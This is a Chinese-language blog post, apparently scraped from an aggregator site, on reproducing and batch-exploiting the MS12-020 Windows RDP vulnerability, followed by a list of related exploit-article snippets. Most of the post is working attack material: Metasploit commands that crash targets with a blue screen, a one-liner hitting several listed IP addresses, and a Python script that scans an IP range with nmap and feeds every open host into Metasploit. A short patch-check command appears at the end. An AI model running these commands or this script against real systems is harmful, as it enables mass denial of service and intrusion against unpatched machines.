2. 程式人生 > >MS12-020漏洞復現及自動化批量利用

MS12-020漏洞復現及自動化批量利用

阿新 發佈:2018-08-24
.com 端口 cidr odi ref class create 藍屏 can

漏洞描述 
Windows 遠程桌面協議漏洞,可執行代碼,POC可導致藍屏。(RDP遠程桌面執行代碼漏洞)

影響目標

Windows XP sp3
Windows xp sp2
Windows Vista sp2
Windows 7
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2

msfpayload利用

msfconsole
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost <ip>
run

此pyload僅支持單目標。

通過msfconsole快速啟動

msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"

通過bash腳本批量生成檢測腳本(nmap-port2ip.py)

#encoding:utf-8
import xml.sax
import sys
import os

class MovieHandler( xml.sax.ContentHandler ):
   def __init__(self, filterport=None):
      self.CurrentData = ""
      self.port=filterport
      self.data = ""
      self.datas=[]

   # 元素開始事件處理
   def startElement(self, tag, attributes):
      self.CurrentData = tag
      if tag == "address":
         self.data=attributes["addr"]

   # 元素結束事件處理
   def endElement(self, tag):
      if self.CurrentData == "address":
         self.datas.append(self.data)
         self.data=""
      self.CurrentData = ""
class Gather(object):
    def __init__(self, filterport=None):
        # 創建一個 XMLReader
        self.parser = xml.sax.make_parser()
        # turn off namepsaces
        self.parser.setFeature(xml.sax.handler.feature_namespaces, 0)

        # 重寫 ContextHandler
        self.Handler = MovieHandler(filterport)
        self.parser.setContentHandler( self.Handler )
    def run(self, port):
        self.Handler.datas=[]
        self.parser.parse(port+".xml")
        print(self.Handler.datas)
    def get_ans(self):
        return self.Handler.datas

if __name__ == "__main__":
    if len(sys.argv) !=3:
        os.exit()
    os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml")
    g = Gather()
    g.run(sys.argv[2])
    # create cmd
    cmd = ‘"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;‘

    ips = g.get_ans()
    if len(ips)>0:
        for ip in g.get_ans():
            cmd += "set rhosts "+ip+";run;"
        cmd += ‘exit;"‘
        os.system("msfconsole -x " + cmd)
# 使用方法
python nmap-port2ip.py <ip> <port>
# 功能:針對某種服務的漏洞對指定IP段的所有主機進行檢測,獲取可能存在問題的主機IP,並調用對應的Msf Payload進行利用嘗試。
# ip可支持單一IP、CIDR形式IP、10.129.1.1-154等幾種,格式與nmap一致
# port僅支持單端口

漏洞補丁檢測

systeminfo | find /i "KB2621440"
如果存在結果如下,證明已打補丁,否則,需要打對應的補丁。

Windows Server 2003補丁

參考文章

  1. 微軟MS12-020

MS12-020漏洞復現及自動化批量利用

相關推薦

MS12-020漏洞復現自動化批量利用

.com 端口 cidr odi ref class create 藍屏 can 漏洞描述 Windows 遠程桌面協議漏洞,可執行代碼,POC可導致藍屏。(RDP遠程桌面執行代碼漏洞) 影響目標 Windows XP sp3 Windows xp sp2 Windows

Windows 10 提權漏洞復現武器化利用

專案地址:https://github.com/SandboxEscaper/randomrepo 相關工具的下載地址: Process Explorer:https://docs.microsoft.com/en-us/sysinternals/downloads/pr

漏洞預警】CVE-2017-8464 震網三代漏洞復現(兩種利用方法)

art cal mage http test ip地址 get for oot 早在6月13日,微軟發布補丁修復編號為CVE-2017-8464的漏洞,本地用戶或遠程攻擊者可以利用該漏洞生成特制的快捷方式,並通過可移動設備或者遠程共享的方式導致遠程代碼執行,追溯到以前,NS

Vivotek 攝像頭遠程棧溢出漏洞分析利用

-418 環境搭建 目標 bin 無法 查看 攝像 遠程調試 鏡像 Vivotek 攝像頭遠程棧溢出漏洞分析及利用 近日,Vivotek 旗下多款攝像頭被曝出遠程未授權棧溢出漏洞,攻擊者發送特定數據可導致攝像頭進程崩潰。 漏洞作者@bashis 放出了可造成攝像頭 Cras

AWD下-MySql漏洞批量利用指令碼

 這個指令碼最開始的構思是在AWD比賽的情景下,因為所有伺服器的環境都相同,只要檢視本地的MySql使用者名稱密碼就知道了所有伺服器的MySql使用者名稱密碼。若伺服器開放了3306埠,那麼利用這一個漏洞就能順利獲得所有伺服器許可權。有備無患,於是就寫了這個Mysql批量連線寫小馬的指

棧溢位漏洞原理基本利用(ret2addr,ret2arg)

菜雞總結下,方便複習。 ret2addr和ret2arg這兩種利用手法在《黑手緩衝區溢位教程》裡有所提及。這兩種只是基本的利用手法,如果開啟了NX(堆疊程式碼不可執行)或者ASLR就無用武之地了,需要更高階的利用手法,例如ret2libc,ret2plt,和ROP等高階利用手法,這篇筆記

最新2018年6月份Wordpress通殺全版本漏洞 詳情利用方法

2018年6月29日,wordpress爆出最新漏洞,該網站漏洞通殺所有wordpress版本,包括目前的wordpress 4.8.6 以及wordpress 4.9.6版本。可以刪除網站上的任意檔案,影響危害嚴重,甚至是致命的一個漏洞,如果被攻擊者利用,後果將不堪設想。截

ThinkPHP遠端命令執行漏洞原理復現

2018年12月11日,exploit-db更新了一個thinkphp框架遠端程式碼執行漏洞exploit地址:https://www.exploit-db.com/exploits/45978由於框架對控制器名沒有進行足夠的檢測導致在沒有開啟強制路由的情況下getshell漏洞影響範圍Thinkphp 5.

thinkphp5.0.22遠端程式碼執行漏洞分析復現

  雖然網上已經有幾篇公開的漏洞分析文章,但都是針對5.1版本的,而且看起來都比較抽象;我沒有深入分析5.1版本,但看了下網上分析5.1版本漏洞的文章,發現雖然POC都是一樣的,但它們的漏洞產生位置是不同的。本文分析5.0.22版本的遠端程式碼執行漏洞,分析過程如下:   (1)漏洞復現   環境php5

RouterSploit:路由器漏洞檢測利用框架

RouteSploit框架是一款開源的漏洞檢測及利用框架,其針對的物件主要為路由器等嵌入式裝置。 框架功能 RouteSploit框架主要由可用於滲透測試的多個功能模組元件組成, 1、 Scanners:模組功能主要為檢查目標裝置是否存在可利用的安全漏洞;

VxWorks Fuzzing 之道:VxWorks 工控實時操作系統漏洞挖掘調試與利用揭秘

設備 coldfire 巴西 目標 自動重啟 ipv packet lec 被攻擊 轉載:freebuf 0×00 前言 關於VxWorks,這裏引用44CON議題《攻擊 VxWorks:從石器時代到星際》探究 一文章中的介紹: VxWorks 是世界上使用最廣泛的一種在嵌

LNK文件(快捷方式)遠程代碼執行漏洞復現過程(CVE-2017-8464)

abi cred starting compute appear pda info 等級 server 漏洞編號:CVE-2017-8464 漏洞等級:嚴重 漏洞概要:如果用戶打開攻擊者精心構造的惡意LNK文件,則會造成遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與本地

Microsoft Edge 瀏覽器遠程代碼執行漏洞POC細節(CVE-2017-8641)

ive buffer png serer virt pil binding nproc mil 2017年8月8日,CVE官網公布了CVE-2017-8641,在其網上的描述為: 意思是說,黑客可以通過在網頁中嵌入惡意構造的javascript代碼,使得微軟的瀏覽器(如E

Office CVE-2017-8570遠程代碼執行漏洞復現

pytho pack root 一個 strong -o 激活 meta 相同 實驗環境 操作機:Kali Linux IP:172.16.11.2 目標機:windows7 x64 IP:172.16.12.2 實驗目的 掌握漏洞的利用方法 實驗

Ansible系列(五):playbook應用和roles自動化批量安裝示例

獲取 agg 真的 deb vhd under ice ddl ssh連接 html { font-family: sans-serif } body { margin: 0 } article,aside,details,figcaption,figure,footer,

Discuz!X 3.4 任意文件刪除漏洞復現過程(附python腳本)

文件刪除 def aaa dal -1 headers bug send auth   今天看下群裏在討論Discuz!X 3.4 任意文件刪除漏洞,自己做了一些測試,記錄一下過程。結尾附上自己編寫的python腳本,自動化實現任意文件刪除。 具體漏洞,請查看 https:

Tomcat CVE-2017-12615 遠程上傳漏洞復現

pan 技術分享 port style 運行 下載鏈接 imp put tom 漏洞名稱:CVE-2017-12615-遠程代碼執行漏洞 CVE-2017-12615:遠程代碼執行漏洞 當 Tomcat運行在Windows操作系統時,且啟用了HTTP PUT請求方法(例

ADV170014 NTLM SSO 漏洞復現

ntc 機制 run machine 虛擬 關閉 server ref his 2017年10月,微軟周二補丁日發布的補丁中有一個可選的安全補丁:ADV170014,這個補丁修復了NTLM認證機制的一個bug,惡意攻擊者可以利用這個bug竊取用戶密碼hash並可以遠程利用該

網站漏洞掃描並自動化工具-XAttacker

化工 att 技術 用途 png 是否 運行腳本 ash 掃描 註:該腳本根據網站的cms類型來掃描,所以推薦用來掃外國的站 運行腳本 ┌─[root@sch01ar]─[/sch01ar/XAttacker] └──? #perl XAttacker.pl 詢問

Struts2-052 漏洞復現

hal pty sha sta bject 程序 html message command s2-052漏洞復現 參考鏈接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/1467